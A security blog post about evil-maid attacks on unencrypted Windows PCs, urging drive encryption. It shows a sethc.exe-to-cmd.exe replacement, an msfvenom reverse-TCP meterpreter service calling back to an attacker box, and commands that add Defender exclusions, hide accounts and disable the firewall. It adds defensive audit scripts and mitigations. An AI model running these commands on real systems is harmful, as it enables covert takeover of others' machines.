Evil Maid – Encrypt your harddrive

The problem

Many companies/people are very aware of their online security. They install firewalls, AV and IDS, avoid running as local admin and in general behave cautiously on the internet. All this is very good, but most people and corporations seem to forget about physical security.

Without physical security all of the above precautions are pretty much useless. In most cases all it takes to compromise a PC is a couple of minutes of physical access. As I am going to show you in this article, it can even be carried out by a non-technical person. That’s why the attack is called the evil-maid attack.

Most companies don’t encrypt their PCs. Some encrypt their laptops, but most fail to encrypt their office workstations. I would claim that in 90% of companies it would be easy to obtain 5 minutes of physical access to a corporate machine using very basic social engineering skills. Most companies let in a lot of third parties like cleaning staff, service technicians, carpenters etc.

At the end of the article I will discuss different kinds of mitigations.

A couple of proof of concept attacks

In both of the following examples I boot up a USB stick and run a couple of commands. This is only for demonstrating what is going on. A real attacker would of course make it start up automatically thereby making it easy to use for a real maid in a miniskirt.

Example 1

I created a small USB stick based on Tiny Core Linux. On this stick I installed the tools needed to access the files and the registry on a Windows NTFS partition. Here is a screen recording of a Windows PC that I don’t have credentials for.

I boot the stick and run a small script that replaces “c:\windows\system32\sethc.exe” with Windows’ own “cmd.exe” file.

After booting back into Windows I can now press the left shift button 5 times to start a command prompt. Windows thinks it starts the sticky keys app, but instead it gives me a prompt where I have “NT AUTHORITY\SYSTEM” rights. From here on I create an extra admin user.

Example 2

In the next example I set up a meterpreter handler on a Kali box to accept reverse TCP connections on port 8888. Now I boot the USB stick on the target machine and run a script that copies my meterpreter payload to the target and, via the registry, also creates a service.

When the Windows machine is booted it automatically creates a meterpreter session back to my Kali box. Again I am “NT AUTHORITY\SYSTEM” and just for fun I take a screenshot of the target machine.

It slides completely under the “Windows Defender” radar, because the service is loaded before the AV.

Why bother?

Many will say that they don’t have secret documents on their PC. But with this USB stick pretty much anyone can perform this attack. Once the bad guys are inside your machine with a meterpreter session pretty much anything is possible: man-in-the-middle attacks, keyboard logging, screen dumping, listening in on the microphone or webcam.

Don’t be the lowest hanging fruit on the tree… Just encrypt your PC! Also the ones that never leave the office.

How to try it yourself

The USB stick was created with Tiny Core Linux.

  1. I first downloaded the Core Plus image.
  2. Mounted it in a VM together with an empty USB stick.
  3. Used the tc-install tool to create a USB-HDD, Whole-disk stick. I chose to install the “Core Only” version which doesn’t provide a GUI.

After booting the stick I installed the tools needed:

tce-load -wi chntpw bash kmaps ntfs-3g git

Then I edited the APPEND line in “/mnt/sda1/boot/extlinux/extlinux.conf” in order to load my local keyboard layout. I also wanted to make my /home and /opt directories persistent. Copy and paste your detected UUIDs.

APPEND quiet multivt vga=791 kmap=qwerty/dk waitusb=5:UUID="xxx" tce=UUID="xxx" home=UUID="xxx" opt=UUID="xxx"

Finally you need my scripts from GitHub. They can be installed like this:

git clone https://github.com/x821938/Evil-Maid-POC.git

The last thing to do is to create a meterpreter payload on your Kali box and transfer it to the “meterpreter-service” directory on the USB stick. I used this command to create my payload:

msfvenom -p windows/meterpreter/reverse_tcp -f exe-service LPORT="8888" LHOST="10.0.2.15" PrependMigrate=true > meterpreter_service.exe

Now you can just follow the videos to replicate my proof of concept.

After getting the foothold.

Because we have SYSTEM rights, one of the first things we would do is make an exclusion for Windows Defender Antivirus:

Add-MpPreference -ExclusionPath "C:\Temp" # Where we want to do malicious stuff...

Or maybe hide our added users from the login screen:

$path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
New-Item $path -Force | New-ItemProperty -Name Username -Value 0 -PropertyType DWord -Force

Or maybe turn off the firewall… Or create some custom rules for our malicious files.

netsh advfirewall set allprofiles state off
New-NetFirewallRule -DisplayName "My Rule" -Direction Inbound -Program "c:\temp\bad.exe" -Action Allow
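
Each of the changes shown in this article leaves something a defender can check for. The audit below is an added example, not part of the article's repository; the function name Get-EvilMaidTrace is hypothetical, and the service check is a heuristic that assumes legitimate service binaries live under the Windows or Program Files directories. Run it from an elevated PowerShell prompt.

```powershell
# Added example, not from the article's repository. Run elevated.
function Get-EvilMaidTrace {   # hypothetical name
    $sys32 = Join-Path $env:SystemRoot 'System32'

    # Example 1: sethc.exe replaced by a copy of cmd.exe. A copy has the same
    # hash as cmd.exe and a version resource that does not name sethc.exe.
    $sethc     = Join-Path $sys32 'sethc.exe'
    $cmdHash   = (Get-FileHash (Join-Path $sys32 'cmd.exe') -Algorithm SHA256).Hash
    $sethcHash = (Get-FileHash $sethc -Algorithm SHA256).Hash
    $origName  = (Get-Item $sethc).VersionInfo.OriginalFilename
    if ($sethcHash -eq $cmdHash -or ($origName -and $origName -notlike 'sethc.exe*')) {
        "sethc.exe is not the sticky keys binary (OriginalFilename: $origName)"
    }

    # Example 2: a service added through the registry. Heuristic (assumption):
    # auto-start services whose binary is outside Windows and Program Files.
    $usual = '^"?(' + [regex]::Escape($env:SystemRoot) + '|' +
             [regex]::Escape($env:ProgramFiles) + ')'
    Get-CimInstance Win32_Service |
        Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName -and
                       $_.PathName -notmatch $usual } |
        ForEach-Object { "Auto-start service to review: $($_.Name) -> $($_.PathName)" }

    # Defender exclusions such as the C:\Temp one above.
    (Get-MpPreference).ExclusionPath | Where-Object { $_ } |
        ForEach-Object { "Defender exclusion path: $_" }

    # Accounts hidden from the login screen: value 0 under SpecialAccounts\UserList.
    $key = Get-Item ('HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' +
                     '\Winlogon\SpecialAccounts\UserList') -ErrorAction SilentlyContinue
    if ($key) {
        $key.GetValueNames() | Where-Object { $key.GetValue($_) -eq 0 } |
            ForEach-Object { "Account hidden from login screen: $_" }
    }

    # Firewall profiles that have been switched off.
    Get-NetFirewallProfile | Where-Object { $_.Enabled -eq 'False' } |
        ForEach-Object { "Firewall profile disabled: $($_.Name)" }
}

Get-EvilMaidTrace
```

An empty result means none of these specific traces were found; entries from the service check need a manual look before they mean anything.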

Mitigations

There are many ways of making life harder for the bad guys. Here are some of them.

Changing the boot order.

This will keep a hotel cleaning maid in a miniskirt from just booting your laptop on a USB stick. But any tech-savvy kid can modify the BIOS settings in a few seconds.

Changing the boot order and setting a BIOS password.

Now the attack will take a little longer and require a screwdriver. In 10 minutes it should be possible to transfer the hard-drive to another machine and do the same trick.

Enable drive-lock / HD-password in BIOS

In order to get access to the hard-drive a password needs to be provided at boot time. It’s a little inconvenient for the user, but it actually makes it quite a bit harder to perform this attack. The main problem is that there are some tools out there to circumvent this protection in some cases. All the data on the drive’s platters is still unencrypted. Technically skilled people will be able to get data out of the drive or maybe alter it. The disk still needs the password to unlock, even if it’s moved to another machine.

Whole-drive encryption

If you have Windows 10 Pro or Enterprise edition you can just enable BitLocker on your system drive. Only a very small part of the OS is unencrypted. It would require a quite sophisticated attack to add code that will survive all the way until Windows is booted. It’s not impossible, but very hard.

If you only have the Windows Home edition you can use the free VeraCrypt. There have been reports of hackers modifying the VeraCrypt bootloader, but it’s not an easy task.

Whole-drive encryption and BIOS secure boot

Enabling secure boot and making sure it’s enabled in Windows together with BitLocker is probably the best thing you can do. Secure boot makes sure that nobody can tinker with your bootloader. The digital signatures of the bootloader and the drivers are checked on boot. They will not be loaded if they have been tampered with.

Now we are not talking about evil maids anymore but probably evil feds instead!
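
To confirm that both mitigations are really in effect on a given machine, the state can be read back from Windows. This is an added example, not from the article; the function name Test-BootProtection is hypothetical. Run it from an elevated PowerShell prompt.

```powershell
# Added example, not from the article. Run elevated.
function Test-BootProtection {   # hypothetical name
    $r = [ordered]@{
        SecureBoot   = $false   # firmware verifies bootloader signatures
        Encrypted    = $false   # system volume fully encrypted
        ProtectionOn = $false   # Off on an encrypted volume = BitLocker suspended
        Protectors   = @()      # e.g. Tpm, TpmPin, RecoveryPassword
    }
    try {
        # Throws on legacy BIOS systems, which cannot do secure boot at all.
        $r.SecureBoot = [bool](Confirm-SecureBootUEFI -ErrorAction Stop)
    } catch { $r.SecureBoot = $false }
    try {
        # The BitLocker cmdlets may be missing on editions without BitLocker.
        $vol = Get-BitLockerVolume -MountPoint $env:SystemDrive -ErrorAction Stop
        $r.Encrypted    = "$($vol.VolumeStatus)" -eq 'FullyEncrypted'
        $r.ProtectionOn = "$($vol.ProtectionStatus)" -eq 'On'
        $r.Protectors   = @($vol.KeyProtector |
                            ForEach-Object { "$($_.KeyProtectorType)" })
    } catch { }
    [pscustomobject]$r
}

$state = Test-BootProtection
$state
if (-not ($state.SecureBoot -and $state.Encrypted -and $state.ProtectionOn)) {
    Write-Warning 'Whole-drive encryption with secure boot is not fully in effect.'
}
```

A volume that reports Encrypted as True but ProtectionOn as False has BitLocker suspended, which leaves the key readable on disk until protection is resumed.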

Lock your door and never leave the room

For some people this is also a solution. Arguably the most secure but maybe not the best, depending on your personality.

Conclusion

Just do something! It’s a minimal effort, it’s free and it makes you sleep a little better at night.

2 thoughts to “Evil Maid – Encrypt your harddrive”

  1. I read your article on how to perform an evil maid attack and am writing to inquire on how you were able to include your script (the one that changed sethc to cmd) within Tiny Core’s operating system files so that you were able to load them during boot up.

    1. There are many ways… just a couple of them are:
      Install the ftp package on tiny and fetch it remotely
      Use wget on tiny core to fetch them from a webserver
      Mount the tiny core usbstick from another linux (in VM or physical machine) and copy.
